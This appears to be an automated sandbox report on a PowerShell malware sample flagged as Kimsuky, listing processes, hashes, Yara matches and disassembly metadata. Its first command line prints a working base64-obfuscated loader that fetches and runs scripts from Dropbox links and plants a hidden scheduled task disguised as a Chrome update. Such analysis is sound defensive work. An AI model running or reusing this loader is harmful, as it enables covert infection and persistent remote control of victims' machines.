                                                                                                                            Commandline:powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9nN21jc2hreDNxbW81bXZ5dGYyY3Qvc2FudGEyLXgudHh0P3Jsa2V5PTVuYmJxZWdjNWE3N3I3NmhpeW02czl5Mmgmc3Q9NzI3Y3MxbXgmZGw9MCIgLU91dEZpbGUgJGFhYTsgJiAkYWFhOyBSZW1vdmUtSXRlbSAtUGF0aCAkYWFhIC1Gb3JjZTs=');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD
                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Kimsuky_9, Description: Yara detected Kimsuky, Source: 00000002.00000002.1821493344.000002C3DAF45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Kimsuky_9, Description: Yara detected Kimsuky, Source: 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Kimsuky_9, Description: Yara detected Kimsuky, Source: 00000002.00000002.1821493344.000002C3DAF29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Kimsuky_9, Description: Yara detected Kimsuky, Source: 00000002.00000002.1820985216.000002C3D9990000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Kimsuky_9, Description: Yara detected Kimsuky, Source: 00000002.00000002.1821493344.000002C3DAF2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:3
                                                                                                                            Start time:02:29:02
                                                                                                                            Start date:27/11/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:PowerShell.exe -WindowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:AppData) \"chrome.ps1\"; & $abc;}"
                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Kimsuky_9, Description: Yara detected Kimsuky, Source: 00000003.00000002.1836552794.0000019FBB236000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Kimsuky_9, Description: Yara detected Kimsuky, Source: 00000003.00000002.1836552794.0000019FBB23A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:4
                                                                                                                            Start time:02:29:02
                                                                                                                            Start date:27/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Disassembly

                                                                                                                            Reset < >

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:1.3%
                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:3
                                                                                                                              Total number of Limit Nodes:0
                                                                                                                              execution_graph 14486 7ffd9b7a6984 14487 7ffd9b7a698d LoadLibraryExW 14486->14487 14489 7ffd9b7a6a3d 14487->14489

                                                                                                                              Executed Functions

                                                                                                                              Function 00007FFD9B7A6984 Relevance: 1.6, APIs: 1, Instructions: 114libraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.1854735452.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b790000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LibraryLoad
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1029625771-0
                                                                                                                              • Opcode ID: 9912798fe078a0b3c5a821291fa01222f68a958a786cda81020249f3175d37cc
                                                                                                                              • Instruction ID: bdf88350d5e00f8c0ae2c6ca798a328210baf43469f6bc0e5f726ef7d665815c
                                                                                                                              • Opcode Fuzzy Hash: 9912798fe078a0b3c5a821291fa01222f68a958a786cda81020249f3175d37cc
                                                                                                                              • Instruction Fuzzy Hash: F531E43190CA4C8FDB59DB988849BE9BBE1FF55320F04826FD009C32A2DB74A805CB91
                                                                                                                              Function 00007FFD9B865213 Relevance: .2, Instructions: 186COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.1855604090.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b860000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: aed2adef6ad24a69dec6ff0c1f73a73f4ee8080e50810110294f2f089592c69a
                                                                                                                              • Instruction ID: 7e2e5311e4c57b054a4048da72d89a1bb3b770e7015db5cd8a8510543c6cefdf
                                                                                                                              • Opcode Fuzzy Hash: aed2adef6ad24a69dec6ff0c1f73a73f4ee8080e50810110294f2f089592c69a
                                                                                                                              • Instruction Fuzzy Hash: 0A514932B0EA8F8FE7A9C75C54256B477D2EF89610B9900BED05EC72E7DE14E8058341
                                                                                                                              Function 00007FFD9B865510 Relevance: .1, Instructions: 148COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.1855604090.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b860000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 96a0cdf8908b20f618e5b672a52f56da529dbcc962044f196cba62354dc81576
                                                                                                                              • Instruction ID: ac1a1b55445cd54c31aa4b0a683cbc11ebcc06e46d9fbff7da61b608b5b2bb3f
                                                                                                                              • Opcode Fuzzy Hash: 96a0cdf8908b20f618e5b672a52f56da529dbcc962044f196cba62354dc81576
                                                                                                                              • Instruction Fuzzy Hash: 62412832B0EA4D8FE7A5D768542D9F877D2EF49320B9901BAD05EC71A7E918ED008741
                                                                                                                              Function 00007FFD9B67E540 Relevance: .1, Instructions: 123COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 142 7ffd9b67e540-7ffd9b67e579 145 7ffd9b67e57b-7ffd9b67e585 142->145 146 7ffd9b67e58a-7ffd9b67e58c 142->146 147 7ffd9b67e58d-7ffd9b67e5fb 145->147 148 7ffd9b67e587 145->148 146->147 150 7ffd9b67e5fd-7ffd9b67e604 147->150 148->146 151 7ffd9b67e62b-7ffd9b67e640 150->151 152 7ffd9b67e606-7ffd9b67e61f 150->152 153 7ffd9b67e623-7ffd9b67e629 152->153 153->150
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.1854112156.00007FFD9B67D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B67D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b67d000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f275910dee69082e209d0b529d742d0a8bb40b8b5e951af4a9bab7d14e3c5509
                                                                                                                              • Instruction ID: c0e294a4ed5e0ba282214c5bb5d7dd19a9f52d66c04b1bbc2559703236dbf8df
                                                                                                                              • Opcode Fuzzy Hash: f275910dee69082e209d0b529d742d0a8bb40b8b5e951af4a9bab7d14e3c5509
                                                                                                                              • Instruction Fuzzy Hash: FE41193140EBC84FE7568B3998919523FF4EF56320B1A05DFD0C8CF1A7D629A84AC792
                                                                                                                              Function 00007FFD9B86525F Relevance: .1, Instructions: 99COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.1855604090.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b860000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fb49b5f0b8519a3a64c653d0428669d3fdb318548f0c5a699f009ac701af2307
                                                                                                                              • Instruction ID: 9ae857f6a9c3b16d72dedb1e7df4f326646b9949d4b8ec2f183df266e94b3091
                                                                                                                              • Opcode Fuzzy Hash: fb49b5f0b8519a3a64c653d0428669d3fdb318548f0c5a699f009ac701af2307
                                                                                                                              • Instruction Fuzzy Hash: 9A21C822F0FA8F8FE7B5C75854796B467C2EF59610B9A00BAD05EC76B2DE14ED058301
                                                                                                                              Function 00007FFD9B86555C Relevance: .1, Instructions: 64COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.1855604090.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b860000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3cac58d7af4d7caa0a181a6a76f6208d563ec7ade1ec20e2a720527352cc6cc9
                                                                                                                              • Instruction ID: 3c8852e6e4045d8c9c7309b0a4f05550d607899685889f5148b9861e2bd8313a
                                                                                                                              • Opcode Fuzzy Hash: 3cac58d7af4d7caa0a181a6a76f6208d563ec7ade1ec20e2a720527352cc6cc9
                                                                                                                              • Instruction Fuzzy Hash: 0A11A332A0E65D8FE7B5D758946C9BC77D2FF4832079A01FAE05DCB1A6DA18ED008741
                                                                                                                              Function 00007FFD9B866984 Relevance: .0, Instructions: 35COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.1855604090.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b860000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4b0e00247f810d48c36f98906eaa41557913cdd04d30d7d11a6357c335310635
                                                                                                                              • Instruction ID: 7b73a8a7b83ecc6009e45965193ef87f9fe5133acdac730fe7783a943c2ed27b
                                                                                                                              • Opcode Fuzzy Hash: 4b0e00247f810d48c36f98906eaa41557913cdd04d30d7d11a6357c335310635
                                                                                                                              • Instruction Fuzzy Hash: 8BF0A73131CF044FD744EE1DD445661B7E0FBA8350F10462FE449C3651DA21E4818782

                                                                                                                              Non-executed Functions

                                                                                                                              Function 00007FFD9B79FAB9 Relevance: 1.8, Strings: 1, Instructions: 575COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.1854735452.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b790000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: #D
                                                                                                                              • API String ID: 0-2218572824
                                                                                                                              • Opcode ID: cde4f25d9821c683c38d75908c771526df7ca8a850562ec67bcea9a040fc115c
                                                                                                                              • Instruction ID: 2d137ef19b746d812e972bba0a304073937bd2e6361812cc8d41b755d4f08421
                                                                                                                              • Opcode Fuzzy Hash: cde4f25d9821c683c38d75908c771526df7ca8a850562ec67bcea9a040fc115c
                                                                                                                              • Instruction Fuzzy Hash: 23E1562BB4D9661DE32972BDB5618FC6B11DF91338B0847B7F29D8D0D78E08208686E5
                                                                                                                              Function 00007FFD9B7A914C Relevance: .8, Instructions: 758COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.1854735452.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b790000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 810dad76196eac24caf3a208531c8d3891822cdb49258b212233642e21d9b3b3
                                                                                                                              • Instruction ID: aea5fd7699655cec9842f30cd2c434872f1a069db8d5e3624828f16498ca8b32
                                                                                                                              • Opcode Fuzzy Hash: 810dad76196eac24caf3a208531c8d3891822cdb49258b212233642e21d9b3b3
                                                                                                                              • Instruction Fuzzy Hash: A842E330A0DB8D4FDBB8DF188869BB577E0FF55300F054279D84EC72A2DA34AA558781
                                                                                                                              Function 00007FFD9B7A91D5 Relevance: .6, Instructions: 600COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.1854735452.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b790000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4a51c099ba7ed9a070f84394b766354e54c7448ae7a34758cdece5fa9c8b3089
                                                                                                                              • Instruction ID: b6504fbadafd160cf8c4d38bae305c8203f606240dbb9d3dfdbcf16c2f012a1d
                                                                                                                              • Opcode Fuzzy Hash: 4a51c099ba7ed9a070f84394b766354e54c7448ae7a34758cdece5fa9c8b3089
                                                                                                                              • Instruction Fuzzy Hash: 97129130A19B4D4FEFB8DF588869BB577E0FF58300F054279D84EC72A2DA34AA558781
                                                                                                                              Function 00007FFD9B79F8A8 Relevance: .5, Instructions: 527COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.1854735452.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b790000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cb232f16372ce4dc76ce2e1bacb9b1dba2503c2453714d32efc1b3b1b5e5e874
                                                                                                                              • Instruction ID: 6a843d92a16618f5f6402ab1cb5dbdede82e58f4892871af6b787616b5c859ce
                                                                                                                              • Opcode Fuzzy Hash: cb232f16372ce4dc76ce2e1bacb9b1dba2503c2453714d32efc1b3b1b5e5e874
                                                                                                                              • Instruction Fuzzy Hash: 64F12621B1D74E4FF7A89B68806127A77C1EF86314F56067DE49EC36F2DE2CA9028341
                                                                                                                              Function 00007FFD9B79247B Relevance: .2, Instructions: 177COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.1854735452.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b790000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b676f09f95fb047fd6bc3eee1b1b0440b469936a2d3c055ef89378d56d0633c3
                                                                                                                              • Instruction ID: 5c3d4041362edc016674ecf562c1e6126fa53f0e9e3e12073728f6d85c9283fa
                                                                                                                              • Opcode Fuzzy Hash: b676f09f95fb047fd6bc3eee1b1b0440b469936a2d3c055ef89378d56d0633c3
                                                                                                                              • Instruction Fuzzy Hash: 53517157B0F7D24FE326A6F8987A0E93FA0DF5366470A02F7C4D54A0B3DA1A2906C751
                                                                                                                              Function 00007FFD9B7A7FD3 Relevance: .2, Instructions: 156COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.1854735452.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b790000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a3414e13ea297a8a87c91830cc428d8fb72e9290349d39bc5045a736f449441b
                                                                                                                              • Instruction ID: eb2a280cbf361d87ccba4367c0a6873e007879adf3b6e5ab2c66549292619f20
                                                                                                                              • Opcode Fuzzy Hash: a3414e13ea297a8a87c91830cc428d8fb72e9290349d39bc5045a736f449441b
                                                                                                                              • Instruction Fuzzy Hash: FA318E2F74C5224EE309B6BEB5554FC6341DFC533470886B7D28A8D0878E0858CB8AD5

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:2%
                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:3
                                                                                                                              Total number of Limit Nodes:0
                                                                                                                              execution_graph 8611 7ffd9b77c4a4 8612 7ffd9b77c4ad LoadLibraryExW 8611->8612 8614 7ffd9b77c55d 8612->8614

                                                                                                                              Executed Functions

                                                                                                                              Function 00007FFD9B77C4A4 Relevance: 1.6, APIs: 1, Instructions: 114libraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000003.00000002.1973734072.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd9b770000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LibraryLoad
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1029625771-0
                                                                                                                              • Opcode ID: 2b08cd8cb3e894a00bdd1c37fc89668b8fcbc7bd2c2b5b51ec2124f3327a1f00
                                                                                                                              • Instruction ID: 34bf17855d709aed39cebc44ca5d84144b42bc8368f7ecc22486d0995f880efb
                                                                                                                              • Opcode Fuzzy Hash: 2b08cd8cb3e894a00bdd1c37fc89668b8fcbc7bd2c2b5b51ec2124f3327a1f00
                                                                                                                              • Instruction Fuzzy Hash: 5531C43190CB5C8FDB19DBA88849BE9BBE0FF55321F04426BD059D3251DB74A415CB91
                                                                                                                              Function 00007FFD9B847255 Relevance: .5, Instructions: 503COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 9 7ffd9b847255-7ffd9b84725f 10 7ffd9b847261 9->10 11 7ffd9b847268-7ffd9b847277 9->11 10->11 12 7ffd9b847280-7ffd9b84728f 11->12 13 7ffd9b847279 11->13 14 7ffd9b847291 12->14 15 7ffd9b847298-7ffd9b8472a7 12->15 13->12 14->15 16 7ffd9b8472b0-7ffd9b8472bf 15->16 17 7ffd9b8472a9 15->17 18 7ffd9b8472c1 16->18 19 7ffd9b8472c8-7ffd9b8472f8 16->19 17->16 18->19 21 7ffd9b84736b-7ffd9b847374 19->21 22 7ffd9b8472fa-7ffd9b84736a 19->22 23 7ffd9b8475ec-7ffd9b8476ab 21->23 24 7ffd9b84737a-7ffd9b847384 21->24 22->21 26 7ffd9b84739d-7ffd9b8473a2 24->26 27 7ffd9b847386-7ffd9b847393 24->27 31 7ffd9b847590-7ffd9b84759a 26->31 32 7ffd9b8473a8-7ffd9b8473ab 26->32 27->26 34 7ffd9b847395-7ffd9b84739b 27->34 35 7ffd9b84759c-7ffd9b8475a8 31->35 36 7ffd9b8475a9-7ffd9b8475e9 31->36 37 7ffd9b8473ad-7ffd9b8473c0 32->37 38 7ffd9b8473c2 32->38 34->26 36->23 43 7ffd9b8473c4-7ffd9b8473c6 37->43 38->43 43->31 46 7ffd9b8473ca-7ffd9b847403 43->46 62 7ffd9b847427 46->62 63 7ffd9b847405-7ffd9b847418 46->63 65 7ffd9b847429-7ffd9b84742b 62->65 63->46 73 7ffd9b84741a-7ffd9b847425 63->73 65->31 67 7ffd9b847431-7ffd9b847439 65->67 67->23 70 7ffd9b84743f-7ffd9b847449 67->70 71 7ffd9b847465-7ffd9b847475 70->71 72 7ffd9b84744b-7ffd9b847463 70->72 71->31 77 7ffd9b84747b-7ffd9b8474ac 71->77 72->71 73->65 77->31 83 7ffd9b8474b2-7ffd9b8474de 77->83 88 7ffd9b8474e0-7ffd9b847507 83->88 89 7ffd9b847509 83->89 90 7ffd9b84750b-7ffd9b84750d 88->90 89->90 90->31 92 7ffd9b847513-7ffd9b84751b 90->92 93 7ffd9b84751d-7ffd9b847527 92->93 94 7ffd9b84752b 92->94 95 7ffd9b847547-7ffd9b847576 93->95 96 7ffd9b847529 93->96 98 7ffd9b847530-7ffd9b847545 94->98 101 7ffd9b84757d-7ffd9b84758f 95->101 96->98 98->95
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000003.00000002.1974680922.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd9b840000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 391f95a872a41f425673f1a779ebd31bdcafc100ebb612d3150636f6b1ca3832
                                                                                                                              • Instruction ID: ebc91550e56d63e6521c37f98571ca25f37d1494f370d790f3bb2cd470677ed2
                                                                                                                              • Opcode Fuzzy Hash: 391f95a872a41f425673f1a779ebd31bdcafc100ebb612d3150636f6b1ca3832
                                                                                                                              • Instruction Fuzzy Hash: 68F13576A0F7CA0FE766976848755B97FA3EF5A314F0A00FAD489CB0E3D918A904C351
                                                                                                                              Function 00007FFD9B8476AD Relevance: .4, Instructions: 394COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 194 7ffd9b8476ad-7ffd9b8476b9 195 7ffd9b8476bc-7ffd9b8476cd 194->195 196 7ffd9b8476bb 194->196 197 7ffd9b8476d0-7ffd9b8476e1 195->197 198 7ffd9b8476cf 195->198 196->195 199 7ffd9b8476e4-7ffd9b8476f5 197->199 200 7ffd9b8476e3 197->200 198->197 201 7ffd9b8476f8-7ffd9b847709 199->201 202 7ffd9b8476f7 199->202 200->199 203 7ffd9b84770c-7ffd9b8477af 201->203 204 7ffd9b84770b 201->204 202->201 213 7ffd9b847970-7ffd9b847a25 203->213 214 7ffd9b8477b5-7ffd9b8477bf 203->214 204->203 215 7ffd9b8477c1-7ffd9b8477d6 214->215 216 7ffd9b8477d8-7ffd9b8477dc 214->216 215->216 219 7ffd9b8477e2-7ffd9b8477e5 216->219 220 7ffd9b847918-7ffd9b847922 216->220 221 7ffd9b8477e7-7ffd9b8477f0 219->221 222 7ffd9b8477fc-7ffd9b847800 219->222 223 7ffd9b84792f-7ffd9b84796d 220->223 224 7ffd9b847924-7ffd9b84792e 220->224 221->222 222->220 229 7ffd9b847806-7ffd9b84783d 222->229 223->213 242 7ffd9b84783f-7ffd9b84785f 229->242 243 7ffd9b847861 229->243 245 7ffd9b847863-7ffd9b847865 242->245 243->245 245->220 247 7ffd9b84786b-7ffd9b8478a5 245->247 255 7ffd9b8478be-7ffd9b8478ee 247->255 256 7ffd9b8478a7-7ffd9b8478b4 247->256 264 7ffd9b8478f0-7ffd9b8478fc 255->264 256->255 259 7ffd9b8478b6-7ffd9b8478bc 256->259 259->255 265 7ffd9b847903-7ffd9b847917 264->265
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000003.00000002.1974680922.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd9b840000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8dc6432f2289e6d1e4a48370c97cd1c7dd8caadb9639ab26abed912bfab07302
                                                                                                                              • Instruction ID: 3f320a0d1ea262d7575c24b02161745a21e4df019d4cc026c033da0a6442c49e
                                                                                                                              • Opcode Fuzzy Hash: 8dc6432f2289e6d1e4a48370c97cd1c7dd8caadb9639ab26abed912bfab07302
                                                                                                                              • Instruction Fuzzy Hash: 14C12666A0F6CD5FEBA297B848745A53FA2EF5E214F0900FFD098C70E3EA185905C351
                                                                                                                              Function 00007FFD9B84438B Relevance: .2, Instructions: 189COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              Memory Dump Source
